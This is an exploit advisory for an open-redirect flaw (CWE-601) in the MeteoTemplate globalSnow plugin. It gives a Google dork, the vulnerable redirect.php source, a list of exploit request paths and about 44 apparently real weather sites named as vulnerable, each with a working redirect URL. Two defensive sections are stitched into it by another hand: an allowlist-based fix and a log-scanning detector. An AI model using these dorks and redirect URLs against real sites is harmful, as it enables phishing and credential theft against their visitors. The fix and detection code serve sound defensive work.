- ####################################################################
- # Exploit Title : MeteoTemplate 17.1 Nectarine globalSnow Plugins 1.1 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 07/03/2019
- # Vendor Homepage : meteotemplate.com
- # Software Download Link : meteotemplate.com/web/downloadRequest.php?file=globalSnow_1.1
- # Software Information Link : meteotemplate.com/web/plugins/globalSnow.php
- # Software Affected Versions : 1.0 and 1.1
- Vulnerable Versions for MeteoTemplate
- Meteotemplate 4.1 Mango
- Meteotemplate 6.0 Blueberry
- Meteotemplate 10.0 Banana
- Meteotemplate 11.0 Passion Fruit
- Meteotemplate 13.0 Lemon
- Meteotemplate 16.0 Physalis
- MeteoTemplate 17.0 Nectarine
- MeteoTemplate 17.1 Nectarine
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : inurl:"/plugins/globalSnow/"
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019030061
- ####################################################################
# Description about Software :
***************************
* A plugin showing current ice and snow in the world as well as in particular areas (Europe, US, Canada).
* World – this one shows several maps of current global snow and ice cover
* U.S. – this page shows several maps for the United States and also regional maps, with the possibility to switch and set default
* Canada – several maps of Canada, both national and regional
* Europe – maps of snow cover and precipitation for Europe
####################################################################
# Impact :
***********
MeteoTemplate 17.1 Nectarine with the globalSnow Plugins 1.1 accepts a user-controlled input that
specifies a link to an external site and uses that link as a redirect target. This simplifies phishing
attacks. An HTTP parameter carries a URL value, and the web application redirects the request to that
URL. By changing the value to a malicious site, an attacker can launch a phishing scam and steal user
credentials. Because the server name in the modified link is identical to the original site, the
phishing attempt has a more trustworthy appearance. An open redirect is a failure in that redirection
process which makes it possible for attackers to steer users to malicious websites; the flaw is used
in phishing attacks to get users to visit such sites without realizing it. Web users often encounter
redirection when they visit the website of a company whose name has changed or which has been acquired
by another company, so a redirect by itself does not look unusual. On the fake page the user's computer
can be infected with malware whose task is to deceive the victim and steal personal data.
####################################################################
# Vulnerable Source Code : [ redirect.php ]
**************************************
<?php
############################################################################
#
# Meteotemplate
# http://www.meteotemplate.com
# Free website template for weather enthusiasts
# Author: Jachym
# Brno, Czech Republic
# First release: 2015
#
############################################################################
#
# Loading Spinner
#
# A script which shows a loading spinner while redirecting.
#
############################################################################
# Version (change log - http://meteotemplate.com/blog/?page_id=42)
#
# v2.0 Watermelon 2015-09-12
#
############################################################################
include("../../config.php");
include($baseURL."css/design.php");
include($baseURL."header.php");
# Source of the flaw: the redirect target is read straight from the "url" query
# parameter. PHP has already decoded $_GET, so urldecode() decodes it a second
# time, and nothing restricts the value to this site or to an allowed list of hosts.
$address = urldecode($_GET["url"]);
?>
<html>
<head>
<?php metaHeader()?>
<style>
    #loading {
        background-color: transparent;
        height: 100%;
        width: 100%;
        position: fixed;
        z-index: 1;
        margin-top: 0px;
        top: 0px;
    }
    #loading-center {
        width: 100%;
        height: 100%;
        position: relative;
    }
    #loading-center-absolute {
        position: absolute;
        left: 50%;
        top: 50%;
        height: 200px;
        width: 200px;
        margin-top: -100px;
        margin-left: -100px;
    }
    .object {
        -moz-border-radius: 50% 50% 50% 50%;
        -webkit-border-radius: 50% 50% 50% 50%;
        border-radius: 50% 50% 50% 50%;
        position: absolute;
        border-left: 5px solid #FFF;
        border-right: 5px solid #FFF;
        border-top: 5px solid transparent;
        border-bottom: 5px solid transparent;
        -webkit-animation: animate 2s infinite;
        animation: animate 2s infinite;
    }
    #object_one {
        left: 75px;
        top: 75px;
        width: 50px;
        height: 50px;
    }
    #object_two {
        left: 65px;
        top: 65px;
        width: 70px;
        height: 70px;
        -webkit-animation-delay: 0.1s;
        animation-delay: 0.1s;
    }
    #object_three {
        left: 55px;
        top: 55px;
        width: 90px;
        height: 90px;
        -webkit-animation-delay: 0.2s;
        animation-delay: 0.2s;
    }
    #object_four {
        left: 45px;
        top: 45px;
        width: 110px;
        height: 110px;
        -webkit-animation-delay: 0.3s;
        animation-delay: 0.3s;
    }
    @-webkit-keyframes animate {
        50% {
            -ms-transform: rotate(180deg);
            -webkit-transform: rotate(180deg);
            transform: rotate(180deg);
        }
        100% {
            -ms-transform: rotate(0deg);
            -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
        }
    }
    @keyframes animate {
        50% {
            -ms-transform: rotate(180deg);
            -webkit-transform: rotate(180deg);
            transform: rotate(180deg);
        }
        100% {
            -ms-transform: rotate(0deg);
            -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
        }
    }
</style>
</head>
<body onload="redirectpage()">
<div id="loading">
    <div id="loading-center">
        <div id="loading-center-absolute">
            <div class="object" id="object_four"></div>
            <div class="object" id="object_three"></div>
            <div class="object" id="object_two"></div>
            <div class="object" id="object_one"></div>
        </div>
    </div>
</div>
</body>
<script>
function redirectpage(){
    // Sink: the unvalidated value becomes the redirect target, so the browser
    // follows whatever URL was supplied in the "url" parameter (CWE-601).
    window.location.href = "<?php echo $address ?>";
}
</script>
</html>
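
A hardened replacement for the target handling in redirect.php, added here as an example; it is not Meteotemplate's code and not part of the advisory. The host allowlist ALLOWED_REDIRECT_HOSTS and the helper names safe_redirect_target(), redirect_script() and handle_redirect_request() are assumptions chosen for illustration. The fix accepts only a same-site path or an http(s) URL whose host is on the allowlist, drops the redundant urldecode() (PHP has already decoded $_GET), and emits the target into the spinner page as a JSON-encoded JavaScript literal instead of a raw echo.

```php
<?php
// Added example (not Meteotemplate code): validate the redirect target instead
// of echoing $_GET["url"] verbatim. Function names and the host allowlist
// below are assumptions for illustration.

// Hosts the plugin may legitimately forward to (hypothetical entries; the real
// list would hold the map providers the globalSnow pages link to).
const ALLOWED_REDIRECT_HOSTS = ['www.example.org', 'maps.example.net'];

/**
 * Return $candidate if it is an acceptable redirect target, otherwise null.
 *
 * Accepted: a same-site path starting with a single "/", or an http(s) URL
 * whose host is exactly one of ALLOWED_REDIRECT_HOSTS.
 * Rejected: other schemes (javascript:, data:), scheme-relative "//host" and
 * "/\host" forms, CR/LF, userinfo tricks such as
 * https://www.example.org@evil.example, and anything parse_url() cannot parse.
 */
function safe_redirect_target(string $candidate): ?string
{
    $candidate = trim($candidate);
    if ($candidate === '' || strpbrk($candidate, "\\\r\n") !== false) {
        return null;
    }
    if ($candidate[0] === '/') {
        // Exactly one leading slash: browsers treat "//host" as scheme-relative.
        return (strlen($candidate) === 1 || $candidate[1] !== '/') ? $candidate : null;
    }
    $parts = parse_url($candidate);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }
    if (!in_array(strtolower($parts['host']), ALLOWED_REDIRECT_HOSTS, true)) {
        return null;
    }
    return $candidate;
}

/**
 * Build the spinner page's redirect script with the target emitted as a
 * JSON-encoded JavaScript string literal, so the value cannot break out of
 * the string or close the <script> element.
 */
function redirect_script(string $target): string
{
    $literal = json_encode($target, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return "<script>\nfunction redirectpage(){\n    window.location.href = " . $literal . ";\n}\n</script>";
}

/**
 * What redirect.php would do with the query string: $_GET is already decoded
 * by PHP, so the original's extra urldecode() is dropped; rejected targets
 * get a 400 instead of a redirect.
 */
function handle_redirect_request(array $get): string
{
    $raw = $get['url'] ?? '';
    $target = is_string($raw) ? safe_redirect_target($raw) : null;
    if ($target === null) {
        http_response_code(400);
        return 'Invalid redirect target';
    }
    return redirect_script($target);
}

// Constructed check cases; run with "php redirect_hardened.php" on the CLI.
if (PHP_SAPI === 'cli') {
    $cases = [
        '/plugins/globalSnow/world.php'         => true,
        'https://www.example.org/snow/'         => true,
        'https://www.evil.example/'             => false,
        '//www.evil.example/'                   => false,
        'javascript:void(0)'                    => false,
        'https://www.example.org@evil.example/' => false,
    ];
    foreach ($cases as $input => $expected) {
        $allowed = safe_redirect_target($input) !== null;
        printf("%-42s %s\n", $input, $allowed === $expected ? 'ok' : 'UNEXPECTED');
    }
}
```

In redirect.php the call `handle_redirect_request($_GET)` would replace both the `$address = urldecode($_GET["url"]);` line and the inline `window.location.href = "<?php echo $address ?>";` echo. An exact-host allowlist is deliberately used rather than a substring match on a trusted domain, since a check like `strpos($host, 'example.org') !== false` would still accept hosts such as `example.org.evil.example`.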
- ####################################################################
- # Open Redirection Exploit :
- **************************
- /template/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /Meteo/template/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /meteotemplate/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /MeteoTemplate/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /template5/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /weather/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /acu/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /knjazevac/MeteoTemplate/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /MT41/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /pws/plugins/globalSnow/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
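
For site operators who cannot patch immediately, the request pattern above is easy to hunt for in web server logs. The script below is an added example, not part of the advisory: it scans combined-format access log lines for hits on the globalSnow redirect.php whose url parameter would send the browser to a host other than the site's own. The function names, the $siteHost value and the sample log lines are constructed for illustration; the double decoding mirrors what the vulnerable script does with urldecode().

```php
<?php
// Added example (not part of the advisory): find access log entries for the
// globalSnow redirect.php whose "url" parameter points off-site. $siteHost
// (the monitored site's own hostname) and all sample data are assumptions.

/** Extract method, request path and status from one combined-format line. */
function parse_access_line(string $line): ?array
{
    if (preg_match('/"([A-Z]+) (\S+) HTTP\/[\d.]+" (\d{3})/', $line, $m) !== 1) {
        return null;
    }
    return ['method' => $m[1], 'path' => $m[2], 'status' => (int) $m[3]];
}

/**
 * Return the external host a redirect.php request would send the browser to,
 * or null when the request is not for the endpoint or the target stays on
 * $siteHost. The target is decoded twice, mirroring the vulnerable script.
 */
function offsite_redirect_host(string $requestPath, string $siteHost): ?string
{
    $parts = parse_url($requestPath);
    if ($parts === false || !isset($parts['path'])) {
        return null;
    }
    if (preg_match('#/plugins/globalSnow/redirect\.php$#', $parts['path']) !== 1) {
        return null;
    }
    parse_str($parts['query'] ?? '', $query);   // first decode, as PHP does for $_GET
    if (!isset($query['url']) || !is_string($query['url'])) {
        return null;
    }
    $target = urldecode($query['url']);         // second decode, as redirect.php does
    $host = parse_url($target, PHP_URL_HOST);   // null for a same-site relative path
    if (!is_string($host) || $host === '') {
        return null;
    }
    return strcasecmp($host, $siteHost) === 0 ? null : strtolower($host);
}

/** Return [[line number, client ip, external host], ...] for suspicious lines. */
function find_offsite_redirects(array $lines, string $siteHost): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        $req = parse_access_line($line);
        if ($req === null) {
            continue;
        }
        $host = offsite_redirect_host($req['path'], $siteHost);
        if ($host !== null) {
            $hits[] = [$i + 1, strtok($line, ' '), $host];
        }
    }
    return $hits;
}

// Constructed sample lines (documentation IP ranges, .example hostnames).
$sampleLog = [
    '203.0.113.5 - - [07/Mar/2019:10:00:01 +0000] "GET /template/plugins/globalSnow/redirect.php?url=https://www.evil.example/login HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/Mar/2019:10:00:02 +0000] "GET /template/plugins/globalSnow/redirect.php?url=/template/plugins/globalSnow/world.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Mar/2019:10:00:03 +0000] "GET /template/plugins/globalSnow/redirect.php?url=%252F%252Fevil.example%252F HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Mar/2019:10:00:04 +0000] "GET /template/plugins/globalSnow/redirect.php?url=https://weather.example.net/maps HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Mar/2019:10:00:05 +0000] "GET /template/index.php HTTP/1.1" 200 5678 "-" "Mozilla/5.0"',
];

if (PHP_SAPI === 'cli') {
    // Expected: lines 1 and 3 are reported; 2 and 4 stay on-site, 5 is not the endpoint.
    foreach (find_offsite_redirects($sampleLog, 'weather.example.net') as [$n, $ip, $host]) {
        printf("line %d: %s requested a redirect to %s\n", $n, $ip, $host);
    }
}
```

The third sample line is the reason for the second decode: a doubly percent-encoded `//evil.example/` survives PHP's own decoding of the query string as `%2F%2Fevil.example%2F`, and only the script's extra urldecode() turns it into a scheme-relative URL, so a detector that decodes once would miss it.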
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] meteotemplate.com/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] roustika.info/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] weatheromaha.net/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteoalcoletge.com/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteo-arbois.fr/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] slovreme.eu/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] sv2bzq.gr/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] weereefde.nl/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteo-lignerolles.fr/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteoherhet.be/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] orzepowice24.pl/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] terminimeteo.altervista.org/meteotemplate/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteofermo.altervista.org/template5/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteorivalta.altervista.org/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteopino.es/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteodonostia.es/acu/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] tomanddonna.co.uk/weather/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteonieuw-vennep.nl/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] asobig.com/weather/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteotirana.al/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] bdibenedetto.ch/MeteoTemplate/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] vallsjon.se/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] lucdesign.nl/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wustrau.org/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] smaniotto.eu/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] monselicemeteo.altervista.org/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] carlobeolchi.net/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter-lehmschlenke.de/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] vreme.in.rs/knjazevac/MeteoTemplate/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter-erichshof-weyhe.de/Meteo/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] akker.be/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteolanaudiere.ca/meteo/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter-saal-io.de/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter-kleve.de/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteo-daoulas.fr/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteobasaldella.it/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] ostarijemet.org/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] ilmeteobrescia.it/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] nexus.byethost32.com/MT41/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter.unterwurzacher.at/meteo/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wetter-hiltenfingen.euro-picture.de/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] priamoservice.gr/pws/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] wettertotal.de/meteo/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- [+] meteopaparano.altervista.org/template/plugins/globalSnow/redirect.php?url=https://cxsecurity.com
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################